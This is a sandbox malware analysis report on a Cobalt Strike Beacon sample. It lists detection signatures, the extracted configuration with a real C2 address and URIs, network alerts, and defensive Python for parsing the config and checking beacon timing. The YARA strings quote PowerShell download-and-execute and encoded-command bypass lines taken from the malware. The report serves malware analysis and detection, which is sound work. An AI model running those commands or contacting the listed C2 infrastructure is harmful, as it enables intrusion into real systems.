Windows Analysis Report
2VsJzzWTpA.exe

Overview

General Information

Sample name: 2VsJzzWTpA.exe (renamed because the original name is a hash value)
Original sample name: 791bbe51360bb7afbe10c8daf7ad6b5c.exe
Analysis ID: 1582935
MD5: 791bbe51360bb7afbe10c8daf7ad6b5c
SHA1: 8f6382479337d8dc829865d72ba6ea02144e0d92
SHA256: 879a5b13745db634a276624a5c476ede618ba844da42d3ec614aafc45051d474
Tags: CobaltStrike, exe, user-abuse_ch

Detection

CobaltStrike
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected CobaltStrike
Yara detected Powershell download and execute
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Found API chain indicative of debugger detection
Machine Learning detection for sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 2VsJzzWTpA.exe (PID: 7304 cmdline: "C:\Users\user\Desktop\2VsJzzWTpA.exe" MD5: 791BBE51360BB7AFBE10C8DAF7AD6B5C)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Name: Cobalt Strike, CobaltStrike
Description: Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon offers the attacker a wealth of functionality, including, but not limited to, command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less: it consists of stageless or multi-stage shellcode that, once loaded by exploiting a vulnerability or executing a shellcode loader, reflectively loads itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS and SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit. The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
Attribution:
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
{"BeaconType": ["HTTPS"], "Port": 5045, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "134.175.121.153,/load", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
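The configuration above is what the sandbox's extractor recovered from the unpacked Beacon in memory. Beacon keeps its settings as a table of records (16-bit index, 16-bit type, 16-bit length, data), XOR-encoded with a single byte; public open-source extractors locate the table by searching for the encoded image of its first record and then walk the records. The following Python is an added example written for this page, not the sandbox's extractor and not Cobalt Strike's own code. It assumes the setting numbering and the XOR keys (0x69 for 3.x, 0x2e for 4.x) used by those public parsers, lists only the settings that appear in this report, and runs over a constructed memory image that mirrors the values above rather than the real sample's memory.

```python
import struct

# Setting index -> name as printed by public open-source Beacon config
# parsers (assumption: taken from those tools, not from vendor docs).
SETTING_NAMES = {
    1: "BeaconType", 2: "Port", 3: "SleepTime", 4: "MaxGetSize", 5: "Jitter",
    8: "C2Server", 10: "HttpPostUri", 29: "Spawnto_x86", 30: "Spawnto_x64",
    37: "Watermark",
}
BEACON_TYPES = {0: "HTTP", 1: "Hybrid HTTP DNS", 2: "SMB", 4: "TCP",
                8: "HTTPS", 16: "Bind TCP"}
# Single-byte XOR keys: 0x69 (Beacon 3.x), 0x2e (Beacon 4.x). Assumption.
XOR_KEYS = (0x69, 0x2e)
# Plain image of the first record header: index 1, type 1 (short), length 2.
FIRST_RECORD = b"\x00\x01\x00\x01\x00\x02"


def xor(buf: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in buf)


def encode_config(settings) -> bytes:
    """Encoder used only to build test input. settings is a list of
    (index, type, value) with type 1=short, 2=int, 3=bytes/str."""
    out = b""
    for idx, typ, val in settings:
        if typ == 1:
            data = struct.pack(">H", val)
        elif typ == 2:
            data = struct.pack(">I", val)
        else:
            data = val.encode() if isinstance(val, str) else val
        out += struct.pack(">HHH", idx, typ, len(data)) + data
    return out


def find_config(blob: bytes):
    """Return (offset, key) of the encoded table, located by the XOR'd
    image of its first record header, or None if no key matches."""
    for key in XOR_KEYS:
        pos = blob.find(xor(FIRST_RECORD, key))
        if pos != -1:
            return pos, key
    return None


def parse_config(blob: bytes):
    hit = find_config(blob)
    if hit is None:
        return None
    pos, key = hit
    dec = xor(blob[pos:], key)
    cfg, off = {}, 0
    while off + 6 <= len(dec):
        idx, typ, length = struct.unpack(">HHH", dec[off:off + 6])
        if idx == 0:          # zero padding follows the last record
            break
        off += 6
        data = dec[off:off + length]
        off += length
        if typ == 1:
            val = struct.unpack(">H", data)[0]
        elif typ == 2:
            val = struct.unpack(">I", data)[0]
        else:                 # string settings are NUL-padded to a fixed width
            val = data.split(b"\x00", 1)[0].decode("latin-1")
        name = SETTING_NAMES.get(idx, f"setting_{idx}")
        cfg[name] = BEACON_TYPES.get(val, val) if name == "BeaconType" else val
    return cfg


def extract_iocs(cfg) -> dict:
    """Turn parsed settings into the indicators a responder blocks or hunts."""
    host, _, get_uri = cfg["C2Server"].partition(",")   # "host,/uri" form
    scheme = "https" if cfg["BeaconType"] == "HTTPS" else "http"
    base = f"{scheme}://{host}:{cfg['Port']}"
    return {
        "c2_host": host,
        "get_url": base + get_uri,
        "post_url": base + cfg["HttpPostUri"],
        "checkin_seconds": cfg["SleepTime"] / 1000,
        "jitter_percent": cfg["Jitter"],
        "watermark": cfg["Watermark"],
        "sacrificial_process": cfg["Spawnto_x64"],
    }


# Constructed memory image (not the real sample): junk, then the table XOR'd
# with 0x2e using the values from this report, then zero padding.
SAMPLE_SETTINGS = [
    (1, 1, 8), (2, 1, 5045), (3, 2, 60000), (4, 2, 1048576), (5, 1, 0),
    (8, 3, "134.175.121.153,/load".ljust(256, "\x00")),
    (10, 3, "/submit.php".ljust(64, "\x00")),
    (29, 3, "%windir%\\syswow64\\rundll32.exe".ljust(64, "\x00")),
    (30, 3, "%windir%\\sysnative\\rundll32.exe".ljust(64, "\x00")),
    (37, 2, 987654321),
]
SAMPLE_DUMP = (b"MZ" + b"\x90" * 64
               + xor(encode_config(SAMPLE_SETTINGS), 0x2e) + b"\x2e" * 32)

if __name__ == "__main__":
    for k, v in extract_iocs(parse_config(SAMPLE_DUMP)).items():
        print(f"{k}: {v}")
```

Two things in the output deserve attention on a real incident: the watermark 987654321 is a well-known value from leaked or cracked Cobalt Strike builds, so it identifies the kit rather than a licensed operator, and the spawnto values mean post-exploitation jobs run inside a freshly started rundll32.exe with no command-line arguments, which is the process-tree artifact to hunt for alongside the C2 URLs.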
Source | Rule | Description | Author | Strings
Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_CobaltStrike | Description: Yara detected CobaltStrike | Author: Joe Security
Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_CobaltStrike_3 | Description: Yara detected CobaltStrike | Author: Joe Security
Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp | Rule: Windows_Trojan_CobaltStrike_ee756db7 | Description: Attempts to detect Cobalt Strike based on strings found in BEACON | Author: unknown
Strings:
  • 0x329a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x32a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x33180:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
  • 0x334b2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
  • 0x33444:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
  • 0x334b2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
  • 0x32a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x32c0f:$a7: could not run command (w/ token) because of its length of %d bytes!
  • 0x32ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x32b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
  • 0x334fc:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
  • 0x32d6a:$a11: Could not open service control manager on %s: %d
  • 0x3329c:$a12: %d is an x64 process (can't inject x86 content)
  • 0x332cc:$a13: %d is an x86 process (can't inject x64 content)
  • 0x335ed:$a14: Failed to impersonate logged on user %d (%u)
  • 0x33255:$a15: could not create remote thread in %d: %d
  • 0x32b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x33203:$a17: could not write to process memory: %d
  • 0x32d9b:$a18: Could not create service %s on %s: %d
  • 0x32e24:$a19: Could not delete service %s on %s: %d
  • 0x32c89:$a20: Could not open process token: %d (%u)
Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp | Rule: Windows_Trojan_CobaltStrike_663fc95d | Description: Identifies CobaltStrike via unidentified function code | Author: unknown
Strings:
  • 0x1d93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp | Rule: Windows_Trojan_CobaltStrike_f0b627fc | Description: Rule for beacon reflective loader | Author: unknown
Strings:
  • 0x1956a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
  • 0x1a89b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
(table truncated: 28 entries in the full report)
Source | Rule | Description | Author | Strings
Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack | Rule: JoeSecurity_CobaltStrike | Description: Yara detected CobaltStrike | Author: Joe Security
Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack | Rule: JoeSecurity_CobaltStrike_3 | Description: Yara detected CobaltStrike | Author: Joe Security
Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack | Rule: Windows_Trojan_CobaltStrike_ee756db7 | Description: Attempts to detect Cobalt Strike based on strings found in BEACON | Author: unknown
Strings:
  • 0x329a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x32a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x33180:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
  • 0x334b2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
  • 0x33444:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
  • 0x334b2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
  • 0x32a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x32c0f:$a7: could not run command (w/ token) because of its length of %d bytes!
  • 0x32ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x32b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
  • 0x334fc:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
  • 0x32d6a:$a11: Could not open service control manager on %s: %d
  • 0x3329c:$a12: %d is an x64 process (can't inject x86 content)
  • 0x332cc:$a13: %d is an x86 process (can't inject x64 content)
  • 0x335ed:$a14: Failed to impersonate logged on user %d (%u)
  • 0x33255:$a15: could not create remote thread in %d: %d
  • 0x32b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x33203:$a17: could not write to process memory: %d
  • 0x32d9b:$a18: Could not create service %s on %s: %d
  • 0x32e24:$a19: Could not delete service %s on %s: %d
  • 0x32c89:$a20: Could not open process token: %d (%u)
Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack | Rule: Windows_Trojan_CobaltStrike_663fc95d | Description: Identifies CobaltStrike via unidentified function code | Author: unknown
Strings:
  • 0x1d93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack | Rule: Windows_Trojan_CobaltStrike_f0b627fc | Description: Rule for beacon reflective loader | Author: unknown
Strings:
  • 0x1956a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
  • 0x1a89b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
(table truncated: 40 entries in the full report)
          No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-01T02:04:38.651886+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49730 | 134.175.121.153 | 5045 | TCP
2025-01-01T02:05:41.997698+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 52520 | 134.175.121.153 | 5045 | TCP
2025-01-01T02:06:43.735723+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 52760 | 134.175.121.153 | 5045 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-01T02:04:40.182365+0100 | 2035651 | 1 | A Network Trojan was detected | 134.175.121.153 | 5045 | 192.168.2.4 | 49730 | TCP
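The three JA3 alerts are one TLS connection each, from a fresh source port, about a minute apart, which is exactly what the extracted configuration predicts (SleepTime 60000 ms, Jitter 0): Beacon sleeps, wakes, opens a new connection to https://134.175.121.153:5045/load, and sleeps again. The Python below is an added example for this page, not part of the Joe Sandbox report, showing how a detection engineer would test observed connection timestamps against a known sleep/jitter setting and, when no configuration is available, score the regularity of the gaps. It uses the three alert timestamps from the table above; the jitter model (jitter shortens the sleep by a random fraction of up to Jitter percent) and the five-second slack for connection setup are assumptions stated in the code.

```python
from datetime import datetime
from statistics import mean, pstdev

# The three outbound TLS connections flagged by Suricata SID 2028765 in this
# report (source ports 49730, 52520, 52760).
OBSERVED_CHECKINS = [
    "2025-01-01T02:04:38.651886+0100",
    "2025-01-01T02:05:41.997698+0100",
    "2025-01-01T02:06:43.735723+0100",
]
# From the extracted configuration: SleepTime 60000 ms, Jitter 0.
SLEEP_MS, JITTER_PCT = 60000, 0


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S.%f%z")


def intervals(timestamps) -> list:
    """Seconds between consecutive connections, in time order."""
    ts = sorted(parse_ts(t) for t in timestamps)
    return [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]


def expected_window(sleep_ms: int, jitter_pct: int, slack_s: float = 5.0):
    """Range of gaps the config allows. Assumption: jitter shortens the sleep
    by a random fraction of up to jitter_pct percent, so a gap lies in
    [sleep*(1-jitter), sleep]; slack_s covers TCP/TLS setup and the request,
    which run before the next sleep starts (also an assumption)."""
    base = sleep_ms / 1000.0
    return base * (1 - jitter_pct / 100.0) - slack_s, base + slack_s


def matches_config(timestamps, sleep_ms: int, jitter_pct: int) -> bool:
    """True when every observed gap falls inside the configured window."""
    lo, hi = expected_window(sleep_ms, jitter_pct)
    gaps = intervals(timestamps)
    return len(gaps) > 0 and all(lo <= g <= hi for g in gaps)


def regularity(timestamps) -> float:
    """Coefficient of variation of the gaps; 0.0 is perfectly periodic.
    Used for hunting when only traffic, not a config, is available."""
    gaps = intervals(timestamps)
    if len(gaps) < 2:
        return float("inf")
    return pstdev(gaps) / mean(gaps)


if __name__ == "__main__":
    print("gaps (s):", [round(g, 3) for g in intervals(OBSERVED_CHECKINS)])
    print("matches SleepTime/Jitter:",
          matches_config(OBSERVED_CHECKINS, SLEEP_MS, JITTER_PCT))
    print("regularity (CV):", round(regularity(OBSERVED_CHECKINS), 4))
```

Three connections are a thin sample; the sandbox stopped the run while the process was sleeping, so the real cadence is only visible for two intervals. In production, compute the same statistics per (source, destination, port) tuple over hours of flow data, and remember that a non-zero Jitter both widens the allowed window and raises the coefficient of variation, so the CV threshold has to be chosen with the expected jitter in mind rather than fixed at the near-zero value this sample produces.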

          AV Detection

Source: 2VsJzzWTpA.exe | Avira: detected
Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 5045, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "134.175.121.153,/load", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
Source: 2VsJzzWTpA.exe | ReversingLabs: Detection: 86%
Source: 2VsJzzWTpA.exe | Virustotal: Detection: 73%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 2VsJzzWTpA.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_00661184 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext
Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_00692020 CryptGenRandom

          Compliance

Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Unpacked PE file: 0.2.2VsJzzWTpA.exe.660000.2.unpack
Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_00679220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_00671C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 4x nop then sub rsp, 28h | 0_2_00402314

          Networking

Source: Network traffic | Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 134.175.121.153:5045 -> 192.168.2.4:49730
Source: Malware configuration extractor | URLs: 134.175.121.153
Source: global traffic | TCP traffic: 192.168.2.4:49730 -> 134.175.121.153:5045
Source: global traffic | TCP traffic: 192.168.2.4:52489 -> 162.159.36.2:53
Source: Joe Sandbox View | ASN Name: CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:52520 -> 134.175.121.153:5045
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49730 -> 134.175.121.153:5045
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:52760 -> 134.175.121.153:5045
Source: unknown | TCP traffic detected without corresponding DNS query: 134.175.121.153 (37 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2 (4 occurrences)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_0066E68C _snprintf,_snprintf,_snprintf,HttpOpenRequestA,HttpSendRequestA,InternetQueryDataAvailable,InternetCloseHandle,InternetReadFile,InternetCloseHandle
Source: global traffic | DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: 2VsJzzWTpA.exe, 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:%u/
Source: 2VsJzzWTpA.exe, 00000000.00000003.1686785325.0000000003CBB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/
Source: 2VsJzzWTpA.exe, 00000000.00000002.3497152919.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000003.2763192162.00000000007BF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: 2VsJzzWTpA.exe, 00000000.00000003.2763192162.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 2VsJzzWTpA.exe, 00000000.00000002.3497152919.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000003.2308900312.00000000007F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?2d42b7044b
Source: 2VsJzzWTpA.exe, 00000000.00000002.3497152919.000000000075C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://134.175.121.153/
Source: 2VsJzzWTpA.exe, 00000000.00000002.3497152919.000000000075C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://134.175.121.153/Z
Source: 2VsJzzWTpA.exe, 00000000.00000002.3497152919.000000000084A000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000003.2308989806.000000000084A000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000003.2763216324.000000000084A000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000003.2763264612.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000002.3497152919.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000002.3497152919.000000000081A000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000002.3497478511.0000000003CB2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://134.175.121.153:5045/load
Source: 2VsJzzWTpA.exe, 00000000.00000003.2763264612.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000002.3497152919.00000000007B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://134.175.121.153:5045/loadK
Source: 2VsJzzWTpA.exe, 00000000.00000003.2763216324.000000000081A000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000003.2308989806.0000000000818000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000003.2308900312.0000000000817000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000002.3497152919.000000000081A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://134.175.121.153:5045/loadn
Source: 2VsJzzWTpA.exe, 00000000.00000003.2763264612.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000002.3497152919.00000000007B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://134.175.121.153:5045/loadp

          System Summary

          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
